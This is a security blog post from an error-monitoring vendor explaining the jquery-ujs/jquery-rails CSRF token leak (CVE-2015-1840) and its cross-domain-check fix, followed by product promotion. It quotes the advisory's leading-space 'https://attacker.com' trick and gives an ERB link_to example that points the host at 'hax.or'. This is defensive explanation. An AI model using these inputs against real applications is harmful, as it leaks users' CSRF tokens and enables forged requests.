Understanding the rails-jquery CSRF vulnerability (CVE-2015-1840)

Several new security disclosures were released recently. One of them was for rails-jquery, the javascript library that implements "remote" links and forms in Rails. In this post we'll dissect the problem and see how it was fixed.

If you're on the Ruby on Rails security mailing list, you saw several new vulnerability disclosures come through yesterday. One of these caught my attention because it had to do with a front-end library jquery-rails. I thought it might be fun to dig into this vulnerability and see how it ticks.

First thing's first, if you use the jquery-rails gem or the jquery-ujs javascript library, go and upgrade to a patched version. These include  jquery-rails versions 4.0.4 and 3.1.3 and jquery-ujs 1.0.4.

You can read the full vulnerability description here. I've also provided an excerpt below:

There is an vulnerability in jquery-ujs and jquery-rails that can be used to bypass CSP protections and allows attackers to send CSRF tokens to attacker domains. This vulnerability has been assigned the CVE identifier CVE-2015-1840. Versions Affected: All. Not affected: Applications which don't use jquery-ujs or jquery-rails. Fixed Versions: jquery-rails versions 4.0.4 and 3.1.3 and jquery-ujs 1.0.4. Impact ------ In the scenario where an attacker might be able to control the href attribute of an anchor tag or the action attribute of a form tag that will trigger a POST action, the attacker can set the href or action to " https://attacker.com" (note the leading space) that will be passed to JQuery, who will see this as a same origin request, and send the user's CSRF token to the attacker domain.

The vulnerability exposes CSRF tokens

There are a few major kinds of "hacks" that web applications are exposed to. One of these is called "cross site request forgery." Here's how it works:

A CSRF attack. Image from http://www.codeproject.com/KB/aspnet/556995/csrf3.jpg A CSRF attack. Image from http://www.codeproject.com/KB/aspnet/556995/csrf3.jpg

Supposed you're logged in to your bank's web app. As an evil hacker, I want to steal all of your money. So I add a special form to my own website and trick you into clicking on it. This malicious form submits a post request to your bank's website, telling it to wire all your money to my account.

CSRF tokens prevent attacks like this from happening...unless the hacker can get his hands on a valid CSRF token.

So a vulnerability like this one isn't the end-goal. Instead it's more like a stepping stone that a hacker can use to do more serious exploits.

This specific vulnerability depends on the fact that jquery-ujs submits CSRF tokens with certain requests. It has to. That's how Rails knows it's your code sending the request and not an attacker.

But what if a sneaky attacker was able to force jquery-ujs to send the request to a server he owned? Then he would be able to scoop up CSRF tokens from your users.

How could they send requests to their own servers? Well, if you use untrusted data to generate your link and form URLs there is a way.

<%= link_to("Delete", unsafe_params, method: :delete) %>

Now if someone used your unsafe params to change the hostname they could cause that request to be sent to any server they liked

<%= link_to("Delete", {controller: :users, host: "hax.or", protocol: " http"}, method: :delete) %>

The vulnerability existed because jquery-ujs didn't check for cross-domain requests

The solution was to add a cross-domain check. It's pretty simple, as you can see in the commit.

The new isCrossDomain method is used to prevent the submission of XSRF tokens  to other domains. The new isCrossDomain method is used to prevent the submission of XSRF tokens to other domains.

What to do next:
  1. Try Honeybadger for FREE
    Honeybadger helps you find and fix errors before your users can even report them. Get set up in minutes and check monitoring off your to-do list.
    Start free trial
    Easy 5-minute setup — No credit card required
  2. Get the Honeybadger newsletter
    Each month we share news, best practices, and stories from the DevOps & monitoring community—exclusively for developers like you.
    author photo

    Starr Horne

    Starr Horne is a Rubyist and Chief JavaScripter at Honeybadger.io. When she's not neck-deep in other people's bugs, she enjoys making furniture with traditional hand-tools, reading history and brewing beer in her garage in Seattle.

    More articles by Starr Horne
    Stop wasting time manually checking logs for errors!

    Try the only application health monitoring tool that allows you to track application errors, uptime, and cron jobs in one simple platform.

    • Know when critical errors occur, and which customers are affected.
    • Respond instantly when your systems go down.
    • Improve the health of your systems over time.
    • Fix problems before your customers can report them!

    As developers ourselves, we hated wasting time tracking down errors—so we built the system we always wanted.

    Honeybadger tracks everything you need and nothing you don't, creating one simple solution to keep your application running and error free so you can do what you do best—release new code. Try it free and see for yourself.

    Start free trial
    Simple 5-minute setup — No credit card required

    Learn more

    "We've looked at a lot of error management systems. Honeybadger is head and shoulders above the rest and somehow gets better with every new release."
    — Michael Smith, Cofounder & CTO of YvesBlue

    Honeybadger is trusted by top companies like: